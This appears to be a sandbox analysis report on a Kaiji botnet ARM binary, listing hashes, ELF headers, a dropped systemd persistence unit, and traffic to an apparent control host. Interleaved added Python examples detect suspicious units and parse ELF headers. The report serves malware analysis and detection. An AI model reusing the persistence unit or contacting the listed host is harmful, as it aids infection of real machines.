                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/lib/libgdi.so.0.8.1, Author: Joe Security
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):6.05036085544014
                                                                          Encrypted:false
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          MD5:C5F2DDE5DCA123520549BD745325FA64
                                                                          SHA1:2B154BF7D864B50F746348BC93044E8E939DBEE1
                                                                          SHA-256:B3F7CB72809A18EA6A45AC6658FAC539E2C066184485E041845D2E2F9949125F
                                                                          SHA-512:66AA8E660403689F1767899FE5423CECF9FCA44C9F3C8DF3937B4E6E87C147F6433FD530601D26F8781D8FFB39B26D3230360BF51632FF035913C9DC43E721C5
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_Kaiji_1, Description: Yara detected Kaiji, Source: /usr/lib/system-mark, Author: Joe Security
                                                                          Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.....................*....................................................................(.................].............*...).......................................4.....................e...........p.5.p.4.L...................o.............5...4.x...................y...........8.6.8.5.................................8.6.8.5....................5.............K...J.@...............................@.K.@.J.h.................................O...N..V...............................KP..KO.\!...............................lQ..lP..e..................C...................d.......................................................................................................................................................................................
                                                                          Process:/tmp/linux_arm6.elf
                                                                          File Type:ASCII text
                                                                          Category:dropped
                                                                          Size (bytes):186
                                                                          Entropy (8bit):4.795801274247707
                                                                          Encrypted:false
                                                                          SSDEEP:3:zMZa7kKXtERv+2AXTMikAdIgQ+NRs7WRA2Iav817WRA2IavpsRs7WRA2Iav2rSkc:z86XWRBADMD+ns7Hvx17Hv2sRs7HvtLc
                                                                          MD5:B02DE6CD28CD922B18D9D93375A70D8B
                                                                          SHA1:021426A5A2FF9EDC80BA5936C94B37525538885E
                                                                          SHA-256:D8D8E5CD33AA3450CD74C63716A02F3DFF39EFEF2836559F110BC93663B1380A
                                                                          SHA-512:DB3FE03AD5E599E6C03AAEC7BF1242F5509FBB624ADB9AFB7499E25487DAEF3F3F1C6BABF51570B527A5AC5C9F4B079AE4CC53BAA9497C0A121328BEF8D04422
                                                                          Malicious:false
Preview (186 bytes; the sandbox renders each newline as '.'):
[Unit]
Description=linux
After=network.target
[Service]
Type=forking
ExecStart=/boot/System.mod
ExecReload=/boot/System.mod
ExecStop=/boot/System.mod
[Install]
WantedBy=multi-user.target
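The dropped unit file above is the persistence artefact worth a detection rule: a service whose Description is just "linux" and whose ExecStart, ExecReload and ExecStop all run the same binary under /boot, a directory that never holds service executables. The following checker is an added example and is not code from the sandbox report or from the sample; SAMPLE_UNIT is the unit text reconstructed from the preview, while the trusted and abused directory lists and the set of generic descriptions are this example's own assumptions.

```python
"""Flag the persistence traits of a dropped systemd unit file.

Added example, not part of the report. SAMPLE_UNIT is reconstructed from
the report's preview (which prints newlines as '.'); the directory lists
and the set of generic descriptions are this example's own assumptions.
"""
import configparser
import os

# Assumption: where a legitimately installed service binary normally lives.
TRUSTED_DIRS = ("/usr/bin", "/usr/sbin", "/usr/lib", "/usr/libexec", "/bin", "/sbin", "/opt")
# Assumption: directories that hold no service binaries on a healthy host.
ABUSED_DIRS = ("/boot", "/tmp", "/var/tmp", "/dev/shm", "/home", "/root", "/etc")
# Assumption: descriptions too generic to belong to a real package.
GENERIC_DESCRIPTIONS = {"", "linux", "system", "service", "daemon"}

SAMPLE_UNIT = """\
[Unit]
Description=linux
After=network.target
[Service]
Type=forking
ExecStart=/boot/System.mod
ExecReload=/boot/System.mod
ExecStop=/boot/System.mod
[Install]
WantedBy=multi-user.target
"""


def under(path: str, dirs: tuple) -> bool:
    """True if path lies inside one of dirs (component-wise, so /boot does not match /bootstrap)."""
    return any(path == d or path.startswith(d + "/") for d in dirs)


def exec_binary(value: str) -> str:
    """Drop systemd's Exec= prefix characters (-, @, :, +, !) and return argv[0]."""
    cmd = value.strip().lstrip("-@:+!")
    return cmd.split()[0] if cmd else ""


def check_unit(text: str) -> list:
    """Return human-readable findings for one unit file; an empty list means nothing was flagged."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str                      # keep the case of ExecStart etc.
    cp.read_string(text)
    findings = []
    if not cp.has_section("Service"):
        return findings
    targets = {k: exec_binary(v) for k, v in cp["Service"].items() if k.startswith("Exec")}
    for key, path in targets.items():
        if not path.startswith("/"):
            findings.append(f"{key}: relative path {path!r}")
            continue
        if under(path, ABUSED_DIRS):
            findings.append(f"{key}: binary under {os.path.dirname(path)}/")
        elif not under(path, TRUSTED_DIRS):
            findings.append(f"{key}: binary outside trusted dirs: {path}")
        if os.path.basename(path).startswith("."):
            findings.append(f"{key}: hidden file {path}")
    # Start, reload and stop all pointing at one binary is the pattern in the dropped unit.
    if len(targets) >= 3 and len(set(targets.values())) == 1:
        findings.append("ExecStart, ExecReload and ExecStop all run the same binary")
    if cp.has_section("Unit"):
        desc = cp["Unit"].get("Description", "").strip().lower()
        if desc in GENERIC_DESCRIPTIONS:
            findings.append(f"generic Description={desc!r}")
    return findings


if __name__ == "__main__":
    for finding in check_unit(SAMPLE_UNIT):
        print(finding)
```

Run against the reconstructed unit it reports the three Exec lines under /boot, the single shared binary and the generic description; a stock unit such as sshd's produces no findings. On a live host the same function can be applied to every file under /etc/systemd/system and /usr/lib/systemd/system.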
                                                                          File type:ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, Go BuildID=QWFqDvXFQJx9U3yrYPnA/M9zZFzD7RNozhwqfDdp2/4NamWS9qaPrrBZ2Ai_7G/E3zHuD-99wHqJg1owbs5, stripped
                                                                          Entropy (8bit):6.05036085544014
                                                                          TrID:
                                                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                          File name:linux_arm6.elf
                                                                          File size:5'242'880 bytes
                                                                          MD5:c5f2dde5dca123520549bd745325fa64
                                                                          SHA1:2b154bf7d864b50f746348bc93044e8e939dbee1
                                                                          SHA256:b3f7cb72809a18ea6a45ac6658fac539e2c066184485e041845d2e2f9949125f
                                                                          SHA512:66aa8e660403689f1767899fe5423cecf9fca44c9f3c8df3937b4e6e87c147f6433fd530601d26f8781d8ffb39b26d3230360bf51632ff035913c9dc43e721c5
                                                                          SSDEEP:24576:44v9ubX4NnJ+VWbqyUcN1Ib4zJqDu3WZZ+5YAKQqN02EXS3vUM6j0AJfuD/s3TW5:+VmmsDjfd5uBbTpHqufwmFp8qOTVI1
                                                                          TLSH:38363C4BB8924682C4E4367ABC7D81D473B34EB99B9713666D04FE3C3ABE1990E35314
                                                                          File Content Preview:.ELF..............(.........4...........4. ...(.........4...4...4...................................d...d.............................(...(...............)...*...*... ... ...............J...K...K..K..p...........Q.td...............................e.......

                                                                          ELF header

                                                                          Class:ELF32
                                                                          Data:2's complement, little endian
                                                                          Version:1 (current)
                                                                          Machine:ARM
                                                                          Version Number:0x1
                                                                          Type:EXEC (Executable file)
                                                                          OS/ABI:UNIX - System V
                                                                          ABI Version:0
                                                                          Entry Point Address:0x7ef80
                                                                          Flags:0x5000002
                                                                          ELF Header Size:52
                                                                          Program Header Offset:52
                                                                          Program Header Size:32
                                                                          Number of Program Headers:7
                                                                          Section Header Offset:276
                                                                          Section Header Size:40
                                                                          Number of Section Headers:14
                                                                          Header String Table Index:3
Sections

Name              Type      Address   Offset    Size      EntSize  Flags  Flags Description  Link  Info  Align
                  NULL      0x0       0x0       0x0       0x0      0x0                       0     0     0
.text             PROGBITS  0x11000   0x1000    0x28dddc  0x0      0x6    AX                 0     0     4
.rodata           PROGBITS  0x2a0000  0x290000  0xbe4d6   0x0      0x2    A                  0     0     8
.shstrtab         STRTAB    0x0       0x34e4d8  0x98      0x0      0x0                       0     0     1
.typelink         PROGBITS  0x35e570  0x34e570  0x164c    0x0      0x2    A                  0     0     8
.itablink         PROGBITS  0x35fbc0  0x34fbc0  0x478     0x0      0x2    A                  0     0     8
.gosymtab         PROGBITS  0x360038  0x350038  0x0       0x0      0x2    A                  0     0     1
.gopclntab        PROGBITS  0x360038  0x350038  0x14b1dc  0x0      0x2    A                  0     0     8
.go.buildinfo     PROGBITS  0x4b0000  0x4a0000  0x140     0x0      0x3    WA                 0     0     16
.noptrdata        PROGBITS  0x4b0140  0x4a0140  0x4f368   0x0      0x3    WA                 0     0     8
.data             PROGBITS  0x4ff4a8  0x4ef4a8  0x56e0    0x0      0x3    WA                 0     0     8
.bss              NOBITS    0x504b88  0x4f4b88  0x1215c   0x0      0x3    WA                 0     0     8
.noptrbss         NOBITS    0x516ce8  0x506ce8  0x6588    0x0      0x3    WA                 0     0     8
.note.go.buildid  NOTE      0x10f9c   0xf9c     0x64      0x0      0x2    A                  0     0     4
Program Segments

Type          Offset    Virtual Address  Physical Address  File Size  Memory Size  Entropy  Flags   Flags Description  Align    Section Mappings
PHDR          0x34      0x10034          0x10034           0xe0       0xe0         2.2550   0x4     R                  0x10000
NOTE          0xf9c     0x10f9c          0x10f9c           0x64       0x64         5.3198   0x4     R                  0x4      .note.go.buildid
LOAD          0x0       0x10000          0x10000           0x28eddc   0x28eddc     5.7687   0x5     R E                0x10000  .text .note.go.buildid
LOAD          0x290000  0x2a0000         0x2a0000          0x20b214   0x20b214     5.6230   0x4     R                  0x10000  .rodata .typelink .itablink .gosymtab .gopclntab
LOAD          0x4a0000  0x4b0000         0x4b0000          0x54b88    0x6d270      6.4028   0x6     RW                 0x10000  .go.buildinfo .noptrdata .data .bss .noptrbss
GNU_STACK     0x0       0x0              0x0               0x0        0x0          0.0000   0x6     RW                 0x4
LOOS+5041580  0x0       0x0              0x0               0x0        0x0          0.0000   0x2a00                     0x4

Prog Interpreter: none for any segment (there is no PT_INTERP, consistent with the statically linked file type). LOOS+5041580 is the OS-specific segment type 0x65041580, PT_PAX_FLAGS, which the Go linker emits with flags 0x2a00; it maps no sections.
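The header and segment tables above can be checked mechanically rather than read by eye. The script below is an added example, not code from the report or from the sample's authors: a minimal ELF32 parser that reads the same fields and derives the properties a triager wants first (no PT_INTERP, hence statically linked; no LOAD segment that is both writable and executable; a non-executable stack from PT_GNU_STACK; the entry point inside the executable segment; how many bytes are zero-filled at load). The bytes it parses are constructed from the values in the tables (only the 276 bytes of ELF header plus program headers, not the real 5 MiB file), and the name PAX_FLAGS for type 0x65041580 is the standard one that readelf abbreviates as LOOS+5041580.

```python
"""ELF32 header and program-header parser with a few load-time checks.

Added example, not part of the sandbox report. build_sample_headers()
returns CONSTRUCTED bytes carrying the values from the report's tables,
so the parser can be exercised offline; on a real file, pass open(path,
'rb').read() to parse_elf32() instead.
"""
import struct

EHDR_FMT = "<16sHHIIIIIHHHHHH"   # ELF32 little-endian header, 52 bytes
PHDR_FMT = "<IIIIIIII"           # ELF32 program header, 32 bytes

PT_LOAD, PT_INTERP, PT_NOTE, PT_PHDR = 1, 3, 4, 6
PT_GNU_STACK = 0x6474E551
PT_PAX_FLAGS = 0x65041580        # readelf prints this OS-specific type as LOOS+5041580
PF_X, PF_W, PF_R = 1, 2, 4
EM_ARM = 40
PT_NAMES = {PT_LOAD: "LOAD", PT_INTERP: "INTERP", PT_NOTE: "NOTE", PT_PHDR: "PHDR",
            PT_GNU_STACK: "GNU_STACK", PT_PAX_FLAGS: "PAX_FLAGS"}


def parse_elf32(data: bytes) -> dict:
    """Parse a little-endian ELF32 header and every program header it points to."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("only ELF32 little-endian is handled here")
    (_ident, e_type, e_machine, _ver, e_entry, e_phoff, e_shoff, e_flags,
     _ehsize, e_phentsize, e_phnum, _shentsize, e_shnum, e_shstrndx) = \
        struct.unpack_from(EHDR_FMT, data, 0)
    if e_phentsize != struct.calcsize(PHDR_FMT):
        raise ValueError(f"unexpected e_phentsize {e_phentsize}")
    if e_phoff + e_phnum * e_phentsize > len(data):
        raise ValueError("program header table runs past the end of the data")
    segments = []
    for i in range(e_phnum):
        p_type, p_offset, p_vaddr, _paddr, p_filesz, p_memsz, p_flags, p_align = \
            struct.unpack_from(PHDR_FMT, data, e_phoff + i * e_phentsize)
        segments.append({"type": PT_NAMES.get(p_type, hex(p_type)), "offset": p_offset,
                         "vaddr": p_vaddr, "filesz": p_filesz, "memsz": p_memsz,
                         "flags": p_flags, "align": p_align})
    return {"type": e_type, "machine": e_machine, "entry": e_entry, "flags": e_flags,
            "phnum": e_phnum, "shoff": e_shoff, "shnum": e_shnum,
            "shstrndx": e_shstrndx, "segments": segments}


def audit(elf: dict) -> dict:
    """Load-time properties a triager checks before running anything."""
    segs = elf["segments"]
    loads = [s for s in segs if s["type"] == "LOAD"]
    stack = [s for s in segs if s["type"] == "GNU_STACK"]
    return {
        "static": not any(s["type"] == "INTERP" for s in segs),
        "wx_segments": [hex(s["vaddr"]) for s in loads
                        if s["flags"] & PF_W and s["flags"] & PF_X],
        "exec_stack": bool(stack) and bool(stack[0]["flags"] & PF_X),
        "entry_in_exec_segment": any(s["flags"] & PF_X and
                                     s["vaddr"] <= elf["entry"] < s["vaddr"] + s["memsz"]
                                     for s in loads),
        "zero_fill_bytes": sum(s["memsz"] - s["filesz"] for s in loads),
    }


def build_sample_headers() -> bytes:
    """CONSTRUCTED input: the 276 header bytes implied by the report's tables (not the real file)."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0, 0]) + b"\x00" * 7   # ELF32, LSB, v1, SYSV ABI
    ehdr = struct.pack(EHDR_FMT, ident, 2, EM_ARM, 1, 0x7EF80, 52, 276, 0x5000002,
                       52, 32, 7, 40, 14, 3)
    phdrs = [
        (PT_PHDR,      0x34,     0x10034,  0x10034,  0xE0,     0xE0,     PF_R,        0x10000),
        (PT_NOTE,      0xF9C,    0x10F9C,  0x10F9C,  0x64,     0x64,     PF_R,        0x4),
        (PT_LOAD,      0x0,      0x10000,  0x10000,  0x28EDDC, 0x28EDDC, PF_R | PF_X, 0x10000),
        (PT_LOAD,      0x290000, 0x2A0000, 0x2A0000, 0x20B214, 0x20B214, PF_R,        0x10000),
        (PT_LOAD,      0x4A0000, 0x4B0000, 0x4B0000, 0x54B88,  0x6D270,  PF_R | PF_W, 0x10000),
        (PT_GNU_STACK, 0x0, 0x0, 0x0, 0x0, 0x0, PF_R | PF_W, 0x4),
        (PT_PAX_FLAGS, 0x0, 0x0, 0x0, 0x0, 0x0, 0x2A00,      0x4),
    ]
    return ehdr + b"".join(struct.pack(PHDR_FMT, *p) for p in phdrs)


if __name__ == "__main__":
    elf = parse_elf32(build_sample_headers())
    print(f"machine={elf['machine']} entry=0x{elf['entry']:x} segments={elf['phnum']}")
    for name, value in audit(elf).items():
        print(f"{name}: {value}")
```

The zero-fill figure (0x186e8 bytes) is the difference between the RW segment's memory and file sizes, which matches .bss plus .noptrbss in the section table up to alignment; a mismatch there, or a LOAD segment carrying both W and X, is the kind of inconsistency that points at a packed or hand-crafted binary rather than a normal Go build.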
TCP Packets

Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 10, 2024 19:03:35.519948959 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:35.639421940 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:35.639548063 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:35.656377077 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:35.775876045 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:36.886375904 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:36.886565924 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:36.886658907 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:36.886658907 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:36.916268110 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:36.919101954 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:37.035970926 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:37.039033890 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:37.431782007 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:37.432070971 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:38.643611908 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:38.643702984 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:41.650850058 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:41.650985956 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:44.658824921 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:44.659082890 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:47.663258076 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:47.663660049 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:50.670845032 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:50.671286106 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:53.676474094 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:53.676712990 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:56.673768997 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:56.674104929 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:03:59.682755947 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:03:59.682960987 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:02.684015989 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:02.684163094 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:05.699423075 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:05.699666977 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:08.702496052 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:08.702739954 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:11.701560974 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:11.701826096 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:14.716150045 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:14.716402054 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:17.726133108 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:17.726464033 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:20.740746975 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:20.740950108 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:23.756840944 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:23.757097006 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:26.761544943 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:26.761945963 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:29.805244923 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:29.805469036 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:32.809067011 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:32.809252024 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:35.807653904 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:35.807876110 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:38.776087046 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:38.776334047 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:41.791584969 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:41.791965961 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:44.794389963 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:44.794536114 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:47.797725916 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:47.797904015 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:50.803540945 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:50.803761959 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:53.815622091 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:53.815804958 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:56.830775023 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:56.830980062 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:04:59.845607996 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:04:59.845760107 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:05:02.847898006 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:05:02.847970963 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:05:05.859402895 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:05:05.859564066 CET  36016        60888      192.168.2.14   93.123.85.138
Dec 10, 2024 19:05:11.874501944 CET  60888        36016      93.123.85.138  192.168.2.14
Dec 10, 2024 19:05:11.874919891 CET  36016        60888      192.168.2.14   93.123.85.138
UDP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Dec 10, 2024 19:03:34.791929960 CET  60077        53         192.168.2.14  1.1.1.1
Dec 10, 2024 19:03:34.793040991 CET  35819        53         192.168.2.14  1.1.1.1
Dec 10, 2024 19:03:34.930026054 CET  53           60077      1.1.1.1       192.168.2.14
Dec 10, 2024 19:03:34.930789948 CET  53           35819      1.1.1.1       192.168.2.14
Dec 10, 2024 19:03:34.946827888 CET  41746        53         192.168.2.14  1.1.1.1
Dec 10, 2024 19:03:34.950164080 CET  36673        53         192.168.2.14  1.1.1.1
Dec 10, 2024 19:03:35.515270948 CET  53           36673      1.1.1.1       192.168.2.14
Dec 10, 2024 19:03:35.515369892 CET  53           41746      1.1.1.1       192.168.2.14
Timestamp                            Source IP      Dest IP        Trans ID  OP Code             Name            Type            Class        DNS over HTTPS
Dec 10, 2024 19:03:34.791929960 CET  192.168.2.14   1.1.1.1        0xec24    Standard query (0)  www.google.com  A (IP address)  IN (0x0001)  false
Dec 10, 2024 19:03:34.793040991 CET  192.168.2.14   1.1.1.1        0xefa1    Standard query (0)  www.google.com  28              IN (0x0001)  false
Dec 10, 2024 19:03:34.946827888 CET  192.168.2.14   1.1.1.1        0x1fc2    Standard query (0)  cc.ava9527.cc   28              IN (0x0001)  false
Dec 10, 2024 19:03:34.950164080 CET  192.168.2.14   1.1.1.1        0x9d1e    Standard query (0)  cc.ava9527.cc   A (IP address)  IN (0x0001)  false
Timestamp                            Source IP      Dest IP        Trans ID  Reply Code    Name            CName  Address         Type            Class        DNS over HTTPS
Dec 10, 2024 19:03:34.930026054 CET  1.1.1.1        192.168.2.14   0xec24    No error (0)  www.google.com  -      142.250.181.68  A (IP address)  IN (0x0001)  false
Dec 10, 2024 19:03:34.930789948 CET  1.1.1.1        192.168.2.14   0xefa1    No error (0)  www.google.com  -      -               28              IN (0x0001)  false
